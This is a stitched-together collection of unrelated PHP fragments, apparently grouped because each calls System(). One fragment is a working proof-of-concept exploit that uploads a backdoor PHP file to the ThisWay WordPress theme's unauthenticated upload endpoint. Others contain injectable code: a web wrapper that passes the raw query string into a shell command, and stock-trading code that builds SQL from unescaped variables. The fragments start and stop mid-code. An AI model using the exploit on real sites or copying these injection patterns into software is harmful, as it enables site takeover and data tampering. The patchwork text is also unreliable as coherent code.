public function __construct($Option) { $this->AppStart = MicroTime(true); if ($Option === 'force') { $this->UseCache = false; } $UrlsPath = __DIR__ . '/urls.json'; $ApiKeyPath = __DIR__ . '/.support/apikey.txt'; $ETagsPath = __DIR__ . '/.support/etags.txt'; if (!File_Exists($ApiKeyPath)) { $this->Log('{lightred}Missing ' . $ApiKeyPath); exit; } else { if (!File_Exists($UrlsPath)) { $this->Log('{lightred}Missing ' . $UrlsPath); exit; } } if ($this->UseCache && File_Exists($ETagsPath)) { $this->ETags = JSON_Decode(File_Get_Contents($ETagsPath), true); } $this->APIKey = Trim(File_Get_Contents($ApiKeyPath)); $this->CurrentTime = Time(); $Data = File_Get_Contents($UrlsPath); // Strip comments $Data = Preg_Replace('#^([\\s]?//.*)#m', '', $Data); $Data = JSON_Decode($Data, true); foreach ($Data as $File => $URL) { $this->URLsToFetch[] = array('URL' => $URL, 'File' => $File); } unset($Data, $URL, $File); $Tries = 5; do { $URLs = $this->URLsToFetch; $this->Log('{yellow}' . Count($URLs) . ' urls to be fetched...'); $this->URLsToFetch = array(); $this->Fetch($URLs, $Tries); } while (!empty($this->URLsToFetch) && $Tries-- > 0); File_Put_Contents($ETagsPath, JSON_Encode($this->ETags, JSON_UNESCAPED_SLASHES | JSON_PRETTY_PRINT)); if ($this->ExtractClientArchives) { $this->Log('{lightblue}Extracting client archives and doing voodoo magic'); // Let's break all kinds of things! :( System('bash ' . __DIR__ . '/extract_client.sh'); } $this->CheckCDN(); $this->Log('{lightblue}Done'); }
public function comenzarCopia(Request $request) { $remitente = Comunidades::getComunidad($request->get('nuestrasComunidades')); if (count($remitente) == 0) { return redirect()->route('copiaSeguridad')->with('mensaje', 'No se puede realizar el envío, selecciona comunidad.'); } $logEnvios = []; //Ruta para linux $backupfile = "CS-PALENCIA_" . date("Y-m-d_H_i_s") . '.sql'; $dbhost = env('DB_HOST'); $dbuser = env('DB_USERNAME'); $dbpass = env('DB_PASSWORD'); $dbnamedb = env('DB_DATABASE'); //Realizamos la copia de seguridad $fileCopiaSeguridad = "backups/" . $backupfile; $copiaSeguridad = "mysqldump --compact --opt --host=" . $dbhost . " --user="******" --password="******" " . $dbnamedb . ">" . $fileCopiaSeguridad; System($copiaSeguridad); //Realizamos la copia de seguridad $logEnvios[] = ["Creada copia de seguridad para la comunidad " . $remitente->comunidad, $fileCopiaSeguridad, true]; $titulo = "Operaciones Realizadas"; return view('copiaSeguridad.listadoLog', compact('titulo', 'logEnvios')); }
$haveAmountQuery = "SELECT amount FROM CurStock WHERE id='{$LoginID}' AND\n stockname='{$stockName}' AND league_id='{$League_id}'"; $haveAmountResult = mysqli_query($connect, $haveAmountQuery); $haveAmountRow = $haveAmountResult->fetch_array(); $haveAmount = $haveAmountRow['amount']; if ($haveAmount >= $queuingRow['amount']) { $sellAmount = $queuingRow['amount']; } else { if ($haveAmount <= 0) { continue; } else { $sellAmount = $haveAmount; } } $sellCash = $sellAmount * $nowPrice; $sellCurStockQuery = "UPDATE CurStock SET amount = amount-'{$sellAmount}'\n WHERE id='{$LoginID}' AND stockname='{$stockName}' AND league_id='{$League_id}'"; mysqli_query($connect, $sellCurStockQuery); $newCashQuery = "UPDATE league_stat SET cash=cash+'{$sellCash}' WHERE id='{$LoginID}'"; mysqli_query($connect, $newCashQuery); $sellLogQuery = "INSERT INTO Log(id, stockname, amount, price, date, league_id)\n VALUES('{$LoginID}', '{$stockName}', '-{$sellAmount}', '{$nowPrice}', '{$Ddate}', '{$League_id}')"; mysqli_query($connect, $sellLogQuery); $insertMessageQuery = "INSERT INTO queuingMessage(userId, leagueId, stockName, price, amount, dDate, value, buySell)\n VALUES('{$LoginID}', '{$League_id}', '{$stockName}', '{$nowPrice}', '{$sellAmount}', '{$Ddate}', '{$sellCash}', 'sell')"; mysqli_query($connect, $insertMessageQuery); $finishQuery = "UPDATE queuing SET finish='1' WHERE id='{$nowId}'"; mysqli_query($connect, $finishQuery); } } System("clear"); echo "Queuing System 작동 중\n"; echo "건드리지 마시오..."; } }
?> - Apache2 + PHP</h2> </head> <body> <p>This is the default PHP page for this server.</p> <p>Apache content starts at /var/www/<br> Apache config files are at /etc/apache2/ </p><p> PHP sample <A HREF="hello.php">hello PHP </A><br/> <A HREF="radio.php">Start Radio PHP </A> -- <A HREF="qradio.php">Check Radio PHP </A> -- <A HREF="killradio.php">Kill Radio PHP </A> <br/> <A HREF="hostinfo.php">hostinfo PHP </A> </p><p> <?php echo "<p>PHP code <br />"; System("who"); echo " --- "; System("whoami"); echo "<p>end<br />"; # phpinfo(); ?> <!-- end PHP --> <IMG alt="BizCard image not found" src="image/BizCard_CountOnQuality.jpg"> </p><p> <A HREF="mailto:jerryleblanc56@yahoo.com">Click here to send eMail to Jerry</A> </p> </body></html>
* Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations * under the License. */ ///Twitter : http://www.twitter.com/Apolikamixitos ///GitHub: http://github.com/apolikamixitos require 'Configuration.php'; require 'src/facebook.php'; // Create our Application instance (replace this with your appId and secret). $facebook = new Facebook(array('appId' => null, 'secret' => null)); $facebook->setAccessToken(ACCESS_TOKEN); $user = $facebook->getUser(); if ($user) { try { //Get the token info $tokeninfo = $facebook->api('/debug_token?input_token=' . ACCESS_TOKEN); echo "Access Token : " . ACCESS_TOKEN; echo "\n\nApplication : " . $tokeninfo['data']['application']; echo "\nUserID : " . $tokeninfo['data']['user_id']; echo "\nStatus : " . ($tokeninfo['data']['is_valid'] ? 'Valid' : 'Invalid'); echo "\nIssued at : " . date("Y-m-d H:i:s", $tokeninfo['data']['issued_at']); echo "\nExpires at : " . date("Y-m-d H:i:s", $tokeninfo['data']['expires_at']); } catch (FacebookApiException $e) { error_log($e); $user = null; } } System("PAUSE");
$q=new mysql(); $q->BuildTables(); if(!$q->TestingConnection()){write_syslog("Unable to logon to mysql",__FILE__);} $datas_file=file_get_contents($file); $datas=explode("\n",$datas_file); write_syslog("$file: ".Count($datas) . " line(s) with " . strlen($datas_file). " bytes length",__FILE__); while (list ($num, $val) = each ($datas) ){ if(trim($val==null)){continue;} if($_GET["DEBUG"]){echo "Parsing line number $num/".Count($datas)."\n";} parseDansLine($val); } @unlink($file); System("/etc/init.d/artica-postfix restart squid &"); function parseDansLine($line){ if(!preg_match('#([0-9\.]+)\s+([0-9\:]+)\s+-\s+(.+?)\s+ht#',$line,$re)){ echo "Failed parsed \"$line\"\n"; } $line="ht".str_replace($re[0],'',$line); $date=str_replace('.',"-",$re[1]) . " " . $re[2]; $client=$re[3]; if(!preg_match('#^(.+?)\s+#',$line,$re)){ echo "Failed $line ".__LINE__."\n"; return false;
// AUTHORS // 2015.12.25 +A.M.Danischewski <adam_ lastname@not gamil.com> // // ORIGINAL AUTHOR // 2015.12.25 +A.M.Danischewski <adam_ lastname@not gamil.com> // // HISTORY // 2015.12.25 V2.1 Initial version // +A.M.Danischewski <adam_ lastname@not gamil.com> // // Copyrighted by A.M.Danischewski 2015+ (c) // You may reuse this code without limit, provided this notice remain in tact. // $info2html_basepath = realpath(dirname(__FILE__)); $page = ""; if (preg_match('/info2html/', $_SERVER["REQUEST_URI"])) { if (isset($_SERVER['QUERY_STRING'])) { $page = $_SERVER["QUERY_STRING"]; } else { print_r($_SERVER); } // Calls info2html, same as if info2html were called from the commmand line. System($info2html_basepath . "/info2html \"" . $page . "\""); } else { if (preg_match('/infocat/', $_SERVER["REQUEST_URI"])) { // Calls infocat, same as if info2html were called from the commmand line. System($info2html_basepath . "/infocat"); } else { return FALSE; } }
#!/usr/bin/php <?php function tile2lon($x, $z) { return $x / pow(2, $z) * 360 - 180; } function tile2lat($y, $z) { $n = M_PI - 2 * M_PI * $y / pow(2, $z); return 180 / M_PI * atan(0.5 * (exp($n) - exp(-$n))); } if (Count($GLOBALS['argv']) != 5) { die("Using: " . $GLOBALS['argv'][0] . " input.osm output.osm x_tile_coord y_tile_coord\nCoords are in zoom 12.\n"); } $x = $GLOBALS['argv'][3] + 0; $y = $GLOBALS['argv'][4] + 0; $input = $GLOBALS['argv'][1]; $output = $GLOBALS['argv'][2]; $maxlat = tile2lat(2 * $y, 12); $minlon = tile2lon($x, 12); $minlat = tile2lat(2 * ($y + 1), 12); $maxlon = tile2lon($x + 1, 12); $plus = 0.3; $minlat -= ($maxlat - $minlat) * $plus; $minlon -= ($maxlon - $minlon) * $plus; $maxlat += ($maxlat - $minlat) * $plus; $maxlon += ($maxlon - $minlon) * $plus; System('osmosis/bin/osmosis --read-xml file=' . $input . ' --bounding-box top=' . $maxlat . ' left=' . $minlon . ' bottom=' . $minlat . ' right=' . $maxlon . ' --write-xml file=' . $output);
echo "Wordpress Exploiting via third party plugin ThisWay theme\n"; echo "[01;31m IT-Solunium for Hackathon [0m\n"; echo "------------------------------------------------------------\n"; echo "\n"; echo "\n"; if (!isset($argv[1]) or !isset($argv[2])) { echo "[01;32m Usage: [0m\n [01;30mphp wordpress_thisway_attack_PoC <url_site_wordpress_vuln> <nom_du_backdoor.php>[0m\n"; echo "\n"; echo "\n"; exit(0); } $uploadfile = $argv[2]; $url_website_vul_racine = $argv[1]; $ch = curl_init("http://{$url_website_vul_racine}/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php"); /* For debugging */ echo "Url to attack -> http://{$url_website_vul_racine}/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php\n"; echo "\n"; echo "Uploading file : {$uploadfile}"; echo "\n"; /**/ curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata' => "@{$uploadfile}")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); /*echo "$postResult";*/ echo "\n"; echo "Le nom du backdoor généré sur le serveur est :\n"; $query = "echo {$postResult} | grep -o settingsimage_[A-Za-z0-9]*.php | uniq -d"; System($query);
<?php $commend = "python /home/ovx/OpenVirteX/utils/getCurrentNetwork.py"; System($commend); // $test = array( // "switches"=> // array( // array("id"=>"00:00:00:00:00:00:00:01"), // array("id"=>"00:00:00:00:00:00:00:02"), // array("id"=>"00:00:00:00:00:00:00:03"), // array("id"=>"00:00:00:00:00:00:00:04"), // array("id"=>"00:00:00:00:00:00:00:05"), // array("id"=>"00:00:00:00:00:00:00:06"), // array("id"=>"00:00:00:00:00:00:00:07"), // array("id"=>"00:00:00:00:00:00:00:08"), // array("id"=>"00:00:00:00:00:00:00:09")), // "hosts"=> // array( // array("id"=>"aa:aa:aa:aa:aa:aa","switchfor"=>"00:00:00:00:00:00:00:01","used"=>"0"), // array("id"=>"aa:aa:aa:aa:aa:ab","switchfor"=>"00:00:00:00:00:00:00:01","used"=>"0"), // array("id"=>"aa:aa:aa:aa:aa:ac","switchfor"=>"00:00:00:00:00:00:00:01","used"=>"1"), // array("id"=>"aa:aa:aa:aa:aa:ad","switchfor"=>"00:00:00:00:00:00:00:01","used"=>"1"), // array("id"=>"aa:aa:aa:aa:aa:ae","switchfor"=>"00:00:00:00:00:00:00:02","used"=>"0"), // array("id"=>"aa:aa:aa:aa:aa:af","switchfor"=>"00:00:00:00:00:00:00:02","used"=>"0"), // array("id"=>"aa:aa:aa:aa:aa:ba","switchfor"=>"00:00:00:00:00:00:00:02","used"=>"0"), // array("id"=>"aa:aa:aa:aa:aa:bb","switchfor"=>"00:00:00:00:00:00:00:02","used"=>"0"), // array("id"=>"aa:aa:aa:aa:aa:bc","switchfor"=>"00:00:00:00:00:00:00:03","used"=>"0"), // array("id"=>"aa:aa:aa:aa:aa:bd","switchfor"=>"00:00:00:00:00:00:00:03","used"=>"0"), // array("id"=>"aa:aa:aa:aa:aa:be","switchfor"=>"00:00:00:00:00:00:00:03","used"=>"0"), // array("id"=>"aa:aa:aa:aa:aa:bf","switchfor"=>"00:00:00:00:00:00:00:03","used"=>"0"), // array("id"=>"aa:aa:aa:aa:aa:ca","switchfor"=>"00:00:00:00:00:00:00:04","used"=>"0"),